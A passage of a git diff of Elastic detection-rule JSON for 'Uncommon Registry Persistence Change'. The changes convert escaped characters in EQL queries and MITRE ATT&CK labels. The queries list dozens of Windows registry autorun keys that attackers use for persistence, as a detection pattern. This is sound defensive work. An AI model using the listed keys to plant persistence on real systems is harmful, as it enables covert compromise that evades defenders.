\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal 
Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n 
\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -59,7 +59,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json index 2bf81df259b..0929aeef3cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json 
+++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_104.json 
@@ -11,9 +11,9 @@ "language": "eql", "license": "Elastic License v2", "name": "Uncommon Registry Persistence Change", - "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) \u003e 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n 
\"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows 
NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", + "query": "registry where host.os.type == \"windows\" and\n /* uncomment once stable length(registry.data.strings) > 0 and */\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Terminal 
Server\\\\Install\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Runonce\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Load\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\Run\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\IconServiceLib\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AppSetup\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Taskman\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\VmApplet\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\*\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\Shell\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logoff\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Logon\\\\Script\",\n 
\"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Shutdown\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts\\\\Startup\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\*\\\\ShellComponent\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnConnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows CE Services\\\\AutoStartOnDisconnect\\\\MicrosoftActiveSync\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Ctf\\\\LangBarAddin\\\\*\\\\FilePath\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Exec\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\",\n \"HKEY_USERS\\\\*\\\\SOFTWARE\\\\Microsoft\\\\Command Processor\\\\Autorun\",\n \"HKEY_USERS\\\\*\\\\Control Panel\\\\Desktop\\\\scrnsave.exe\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\*\\\\VerifierDlls\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\GpExtensions\\\\*\\\\DllName\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\SafeBoot\\\\AlternateShell\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\Wds\\\\rdpwd\\\\StartupPrograms\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\BootExecute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\SetupExecute\",\n 
\"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\Execute\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\Session Manager\\\\S0InitialCommand\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\ServiceControlManagerExtension\",\n \"HKLM\\\\SYSTEM\\\\ControlSet*\\\\Control\\\\BootVerificationProgram\\\\ImagePath\",\n \"HKLM\\\\SYSTEM\\\\Setup\\\\CmdLine\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\UserInitMprLogonScript\") and\n\n not registry.data.strings : (\"C:\\\\Windows\\\\system32\\\\userinit.exe\", \"cmd.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\",\n \"C:\\\\Program Files\\\\*.exe\") and\n not (process.name : \"rundll32.exe\" and registry.path : \"*\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\Extensions\\\\*\\\\Script\") and\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe\",\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"C:\\\\Program Files\\\\*.exe\",\n \"C:\\\\Program Files (x86)\\\\*.exe\")\n", "references": [ - "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082\u0026seqNum=2" + "https://www.microsoftpressstore.com/articles/article.aspx?p=2762082&seqNum=2" ], "related_integrations": [ { @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json index 8e17f606dd3..7e05b1386de 100644 --- a/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json 
+++ b/packages/security_detection_engine/kibana/security_rule/54902e45-3467-49a4-8abc-529f2c8cfb80_105.json 
